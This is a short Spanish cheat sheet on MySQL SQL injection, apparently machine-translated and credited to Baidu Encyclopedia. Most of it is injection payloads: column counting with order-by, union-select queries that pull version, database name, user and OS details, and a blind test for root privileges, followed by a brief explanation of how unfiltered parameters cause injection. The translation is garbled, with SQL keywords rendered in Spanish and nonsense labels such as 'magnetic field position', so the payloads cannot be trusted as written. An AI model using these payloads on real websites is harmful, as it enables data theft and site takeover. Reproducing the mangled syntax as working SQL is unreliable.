Declaraciones de programación asociadas
Longitud del campo de ráfaga
Ordenar por número/*
Campo coincidente
Seleccione 1, 2, 3 conjuntamente con 1=1, 4, 5...n/*
Posición crítica del campo magnético
Combinado con 1=2 para seleccionar 1, 2, 3, 4, 5.....n/ *
Utilice funciones integradas para explotar la información de la base de datos
Versión() base de datos() usuario()
Puede explotar la información de la base de datos sin adivinar los campos disponibles (no aplicable a algunos sitios web):
Y 1 = 2 unión todos seleccione la versión()/*
Y 1 = 2 unión todos seleccione la base de datos()/*
Y 1 = 2 unión todos seleccionan usuario()/*
Información del sistema operativo:
Ambos seleccionan @ @ global versión _ compilar _ SO del usuario MySQL/*.
Permisos de base de datos:
Y ord (mid (user(), 1, 1)) = 114/* devuelve la descripción normal como root.
Datos ampliados:
Una vez que alguien obtiene o modifica los datos del sitio web, esa persona puede obtener el control de todo el sitio web. En cuanto a cómo obtener estos datos, no hablaré de contraseñas MSSQL débiles. Lo más probable es que el resto aproveche las vulnerabilidades de inyección.
Cuando un usuario envía un parámetro fuera del sitio web, ingresa a la base de datos para su procesamiento y luego envía el resultado procesado al usuario, esta es la página web dinámica más común. Sin embargo, una vez que este parámetro no se filtra, nuestra propia declaración SQL construida también puede participar en las operaciones de la base de datos junto con este parámetro, entonces se producirá una vulnerabilidad de inyección SQL.
Es normal que un sitio web envíe datos ajenos. Generalmente, los parámetros se utilizan para aceptar (solicitudes) y luego procesarlas, y las operaciones de la base de datos representan una gran parte.
Enciclopedia Baidu-Inyección